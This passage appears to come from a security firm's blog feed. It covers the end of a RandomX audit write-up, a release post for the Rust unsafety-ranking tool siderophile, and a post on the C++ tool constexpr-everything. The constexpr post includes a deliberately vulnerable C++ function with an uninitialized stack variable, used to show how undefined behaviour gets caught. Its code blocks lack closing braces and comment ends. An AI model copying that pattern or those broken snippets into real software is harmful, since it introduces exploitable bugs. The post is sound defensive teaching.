The Dataset (a read-only memory structure) is expanded from the Cache. Datasets are designed to be a large segment of memory that contain data the virtual machine will read. There are two values that control the size of the Dataset (RANDOMX_DATASET_BASE_SIZE and RANDOMX_DATASET_EXTRA_SIZE). Together, they place an upper bound on the total memory the algorithm requires. Extra size is used to push the memory slightly beyond a power of two boundary, which makes life harder for ASIC manufacturers. The actual Dataset generation is performed by loading data from the Cache, generating a set of SuperscalarHash instances, and then invoking those instances to get a final output. SuperscalarHash is designed to consume power while waiting for data from DRAM. This hurts an ASIC that attempts to compute Datasets dynamically from the Cache.

Step 3

The Scratchpad (read/write memory) is initialized by performing a blake2 hash on the input data and using the resulting output to seed the AesGenerator. This generator uses AES-NI instructions to fill the Scratchpad. Generation of the initial Scratchpad uses AES transformations. This algorithm is already hardware-accelerated on modern CPUs, so an ASIC will gain no advantage implementing it. The Scratchpad itself is a (relatively) large read/write data structure designed specifically to fit in caches that are available in CPUs.

Step 4

Now we get to the core of the algorithm: the randomized programs running on a virtual machine. The VM is executed by building a program using random bytes created using another generator. The RandomX virtual machine architecture is carefully designed to allow any sequence of 8-byte words to be a valid instruction. These instructions are designed to:

  • Require double precision floating point operations
  • Use 128-bit vector math
  • Use all four IEEE 754 floating point rounding modes
  • Read and write to the Scratchpad, which as previously stated is designed to fit entirely in CPU caches and thus be very fast
  • Take advantage of branch prediction via a low probability branch instruction
  • Execute instructions using the superscalar and out-of-order execution capabilities of a CPU

Each of these properties is a particular strength of general-purpose CPUs and requires additional die area to implement on an ASIC, reducing its advantage.

The resulting state of the VM after program execution is hashed and used to generate a new program. The number of loops executed in this fashion is configurable but is set to eight by default. This looping behavior was chosen to avoid situations where an ASIC miner might only implement a subset of possible operations and only run “easy” programs on the virtual machine. Since the subsequent program cannot be determined until the current one has been fully executed, a miner cannot predict whether the entirety of the chain will be “easy,” so it becomes impractical to implement a partial set of instructions.

Step 5

Finally, the Scratchpad and Register File (the virtual machine’s registers) are hashed using AesHash followed by a final blake2 hash. This step offers no significant ASIC resistance beyond the use of AES instructions, but is included to show the final hashing to a 64-byte value.

What we found

In the course of our two person-week review we found three issues (two low severity, one informational).

Single AES rounds used in AesGenerator

The AES encryptions described by the RandomX specification refer to a single round of AES, which is insufficient for full mixing of the input data. RandomX doesn’t depend on the encryption of AES for its security. Instead, AES is used as a CPU-biased fast transformation that provides diffusion across the output. However, diffusion of bits through the output is dependent upon the number of rounds of AES.

The severity of this finding is “low” because the requisite lack of diffusion requires finding additional bias in almost every step of the algorithm, and then crafting an input that can propagate that bias through the entire chain.

Subsequent to the disclosure of this finding, the RandomX team developed a new AesGenerator4R function that performs four rounds. This functionality has been merged into RandomX as of pull request 46. Four rounds as part of program generation resolves the concerns documented in this issue.

Insufficient Testing and Validation of VM Correctness

The RandomX codebase lacks test coverage validating the semantics of the virtual machine (VM). Trail of Bits devoted half of this engagement (one person-week) to assessing the general security properties of the algorithm implementation. While this effort revealed several code-quality findings, it was insufficient to validate the absence of semantic errors in the VM implementation.

The severity of this finding is “low” because the correctness of RandomX is irrelevant as long as: (1) its output is deterministic, (2) its output is cryptographically random, and (3) its reference implementation is the sole one used for mining in a blockchain. However, any discrepancy between the specification and the reference implementation can lead to consensus issues and forks in the blockchain.

Consider the case where a third-party cleanroom implementation of the RandomX specification becomes popular on a blockchain using RandomX for proof-of-work. The blockchain will fork—potentially at some distant point in the past—if there is even a subtle semantic difference between the miners’ implementations.

Configurable parameters are brittle

RandomX contains 47 configurable parameters, including flags for parallelization, memory consumption, and iterations of the initial KDF, memory size of the dataset, sizing of three levels of cache for the virtual CPU, the size and iteration count of programs executed on the VM, and cache access/latency. The default parameters have been chosen to maximize CPU advantage for the algorithm. However, the threat of 51% attacks forces alternate blockchains interested in using RandomX to make different choices for these parameters. These choices must be made without clear insight into which ones may compromise the algorithm’s advantages. This brittleness could impede third-party adoption.

Subsequent to this finding, the RandomX team has removed a few unnecessary parameters, written additional guidance about what configuration values are safe to change, and added a new set of checks that prohibit a set of unsafe configurations.

Assessment depth

There is a belief in the blockchain industry that many small reviews is a better use of review capital than one large one. This belief is predicated on the notion that every review team will approach the codebase differently and apply different expertise. The supposed diversity of approaches and expertise will provide better coverage and shake out more bugs than having a single team do a deep dive on a given project.

We believe that larger, singular assessments provide better overall value to the client. As a customer, you are paying the assessment team to provide their expert opinion, but like any new employee they need time to ramp up on your codebase. Once that initial learning period is complete, the quality and depth of the assessment rapidly increases. Many large-scale, long-term code assessments do not reveal their most critical or meaningful findings until late in the engagement.

As a client you should hire a single firm for a larger engagement rather than multiple firms for smaller ones for precisely the same reasons you place value on employee retention. Replacing a firm that has domain knowledge will cost time and money if you choose to employ a new firm.

This principle of software assurance is captured well in an old talk from Dave Aitel: The Hacker Strategy. Namely, the quality of vulnerabilities a researcher can find is strongly correlated to the time spent. One hour nets you extremely shallow problems, one week significantly more depth, and with one month you can find vulnerabilities that no one else is likely to discover.

This is further discussed in Zero Days, Thousands of Nights — the authoritative reference on vulnerability research based on dozens of interviews with experts in the field:

The method of finding vulnerabilities can have an impact on which vulnerabilities are actually found. As one example, recent research claims that fuzzers find only the tip of the iceberg in terms of vulnerabilities (Kirda et al., no date). Vulnerabilities can be found via fuzzing in newer or less mature products, or those with simple code bases. For products that have a longer life, are more complex, are popular with a large market share, or are high revenue generators, more people have evaluated the code bases, and finding vulnerabilities often requires more in-depth auditing, logic review, and source code analysis, in order to go several layers deep.

For example, manually validating the correctness of the RandomX VM (which is the most serious issue we discovered) would take several person-weeks alone. It’s highly likely that, at the end of all four audits, there will be no guarantee that the VM implementation is free of semantic errors.

Similarly, analyzing the cryptographic strength of each function in RandomX was achievable within the engagement, but exploring whether there exist methods to propagate potential bias across steps requires a deeper look. Small engagements prohibit this type of work, favoring shallower results.

Current project status

Our two person-week audit was the first of multiple reviews the RandomX team has scheduled. Over the next few weeks the project is undergoing three additional small audits, the results of which should be published later this month. Once these audits are published and any additional findings are resolved by the RandomX authors, it is the intent of both Arweave and Monero to adopt this algorithm in their respective products in a scheduled protocol upgrade.

Siderophile: Expose your Crate’s Unsafety

Today we released a tool, siderophile, that helps Rust developers find fuzzing targets in their codebases.

Siderophile trawls your crate’s dependencies and attempts to finds every unsafe function, expression, trait method, etc. It then traces these up the callgraph until it finds the function in your crate that uses the unsafety. It ranks the functions it finds in your crate by badness—the more unsafety a function makes use of, the higher its badness rating.

Siderophile ([ˈsidərəˌfīl]) – Having an affinity for metallic iron

We created Siderophile for an engagement where we were delivered a massive Rust codebase with a tight timeframe for review. We wanted to fuzz it but weren’t even sure where to start. So, we created a tool to determine which functions invoked the most unsafe behavior. We were able to speed up our bug discovery by automating the targeting process with siderophile. We’re now open-sourcing this tool so everyone can benefit from it!

Sample Output

Here is a sample of siderophile when run on molasses, a crate we’re building that fully implements the MLS cryptographic protocol:

Badness Function

    012 molasses::crypto::hash::HashFunction::hash_serializable

    005 molasses::crypto::hash::HashContext::feed_serializable

    003 molasses::utils::derive_node_values

    003 molasses::application::encrypt_application_message

    003 molasses::application::decrypt_application_message

    003 molasses::group_ctx::GroupContext::new_from_parts

    003 molasses::group_ctx::GroupContext::from_welcome

    003 molasses::group_ctx::GroupContext::update_transcript_hash

    003 molasses::group_ctx::GroupContext::update_tree_hash

    003 molasses::group_ctx::GroupContext::update_epoch_secrets

    003 molasses::group_ctx::GroupContext::apply_update

As you can see, much of the unsafety comes from the serialization and crypto-heavy routines. We’ll be sure to fuzz this bad boy before it goes 1.0.


This is not guaranteed to catch all the unsafety in a crate’s deps. For instance, we don’t have the ability to inspect macros or resolve dynamically dispatched methods since unsafe tagging only occurs at a source-level. The ergonomics for the tool could be better, and we’ve already identified some incorrect behavior on certain crates. If you’re interested in helping out, please do! We are actively maintaining the project and have some issues written out.

Try it Out

Siderophile is on Github along with a better explanation of how it works and how to run the tool. You should run it on your Rust crate, and setup fuzzers for what it finds. Check it out!

Finally, thanks to cargo-geiger and rust-praezi for current best practices. This project is mostly due to their work.

Use constexpr for faster, smaller, and safer code

With the release of C++14, the standards committee strengthened one of the coolest modern features of C++: constexpr. Now, C++ developers can write constant expressions and force their evaluation at compile-time, rather than at every invocation by users. This results in faster execution, smaller executables and, surprisingly, safer code.

Undefined behavior has been the source of many security bugs, such as Linux kernel privilege escalation (CVE-2009-1897) and myriad poorly implemented integer overflow checks that are removed due to undefined behavior. The C++ standards committee decided that code marked constexpr cannot invoke undefined behavior when designing constexpr. For a comprehensive analysis, read Shafik Yaghmour’s fantastic blog post titled “Exploring Undefined Behavior Using Constexpr.”

I believe constexpr will evolve into a much safer subset of C++. We should embrace it wholeheartedly. To help, I created a libclang-based tool to mark as much code as possible as constexpr, called constexpr-everything. It automatically applies constexpr to conforming functions and variables.

Constexpr when confronted with undefined behavior

Recently in our internal Slack channel, a co-worker was trying to create an exploitable binary where the vulnerability was an uninitialized stack local, but he was fighting the compiler. It refused to generate the vulnerable code.

/* clang -o example example.cpp -O2 -std=gnu++14 \
   -Wall -Wextra -Wshadow -Wconversion
typedef void (*handler)();

void handler1();
void handler2();
void handler3();

handler handler_picker(int choice) {
    handler h;
    switch(choice) {
    case 1:
        h = handler1;
    case 2:
        h = handler2;
    case 3:
        h = handler3;

    return h;

When compiling the example code with a modern compiler (clang 8.0), the compiler silently eliminates the vulnerable cases. If the caller specifies a choice not handled by the switch (such as 0 or 4), the function returns handler2. This is true on optimization levels greater than -O0. Try it for yourself on Compiler Explorer!

My default set of warnings (-Wall -Wextra -Wshadow -Wconversion) doesn’t warn about this on clang at all (Try it). It prints a warning on gcc but only with optimizations enabled (-O0 vs -O1)!

Note: If you want to print all the warnings clang knows about, use -Weverything on clang when developing.

The reason for this is, of course, undefined behavior. Since undefined behavior can’t exist, the compiler is free to make assumptions on the code — in this case assuming that handler h can never be uninitialized.

Right now the compiler silently accepts this bad code and just assumes we know what we’re doing. Ideally, it would error out. This is where constexpr saves us.

/* clang -o example example.cpp -O2 -std=gnu++14 \
   -Wall -Wextra -Wshadow -Wconversion
typedef void (*handler)();

void handler1();
void handler2();
void handler3();

constexpr handler handler_picker(int choice)
    handler h;
    switch(choice) {
    case 1:
        h = handler1;
    case 2:
        h = handler2;
    case 3:
        h = handler3;

    return h;
<source>:9:13: error: variables defined in a constexpr 
function must be initialized
    handler h;

1 error generated.
Compiler returned: 1

constexpr forced an error here, which is what we want. It works on most forms of undefined behavior but there are still gaps in the compiler implementations.

constexpr everything!

After some digging in the clang source, I realized that I can use the same machinery libclang uses to determine if something can be constexpr during its semantic analysis to automatically mark functions and methods as constexpr. While this won’t detect more undefined behavior directly, it will help us mark as much code as possible as constexpr.

Initially I started writing a clang-tidy pass, but ran into trouble with the available APIs and the context available in the pass. I decided to create my own stand-alone tool: constexpr-everything. It is available on our GitHub and should work with recent libclang versions.

I wrote two visitors, one which tries to identify if a function can be marked as constexpr. This turned out to be fairly straightforward; I iterate over all the clang::FunctionDecls in the current translation unit and ask if they can be evaluated in a constexpr context with clang::Sema::CheckConstexprFunctionDecl, clang::Sema::CheckConstexprFunctionBody, and clang::Sema::CheckConstexprParameterTypes. I skip over functions that are already constexpr or can’t be (like destructors or main). When the analysis detects a function that can be constexpr but isn’t already, it issues a diagnostic and a FixIt:

$ ../../../build/constexpr-everything ../test02.cpp
constexpr-everything/tests/02/test02.cpp:13:9: warning: function can be constexpr
        X(const int& val) : num(val) {
constexpr-everything/tests/02/test02.cpp:17:9: warning: function can be constexpr
        X(const X& lVal)
constexpr-everything/tests/02/test02.cpp:29:9: warning: function can be constexpr
        int getNum() const { return num; }
3 warnings generated.

FixIts can be automatically applied with the -fix command line option.

Trouble applying constexpr variables

We need to mark variables as constexpr in order to force evaluation of constexpr functions. Automatically applying constexpr to functions is easy. Doing so on variables is quite difficult. I had issues with variables that weren’t previously marked const getting marked const implicitly through the addition of constexpr.

After trying to apply constexpr as widely as possible and fighting with my test cases, I switched tactics and went with a much more conservative approach: only mark variables that are already const-qualified and have constexpr initializers or constructors.

$ ../../../build/constexpr-everything ../test02.cpp -fix
constexpr-everything/tests/02/test02.cpp:47:5: warning: variable can be constexpr
const X x3(400);</code>

constexpr-everything/tests/02/test02.cpp:47:5: note: FIX-IT applied suggested code changes
1 warnings generated.

While this approach won’t apply constexpr in every case possible, it can safely apply it automatically.

Try it on your code base

Benchmark your tests before and after running constexpr-everything. Not only will your code be faster and smaller, it’ll be safer. Code marked constexpr can’t bitrot as easily.

constexpr-everything is still a prototype – it has a couple of rough edges left. The biggest issue is FixIts only apply to the source (.cpp) files and not to their associated header files. Additionally, constexpr-everything can only mark existing constexpr-compatible functions as constexpr. We’re working on using the machinery provided to identify functions that can’t be marked due to undefined behavior.

The code is available on our GitHub. To try it yourself, you’ll need cmake, llvm and libclang. Try it out and let us know how it works for your project.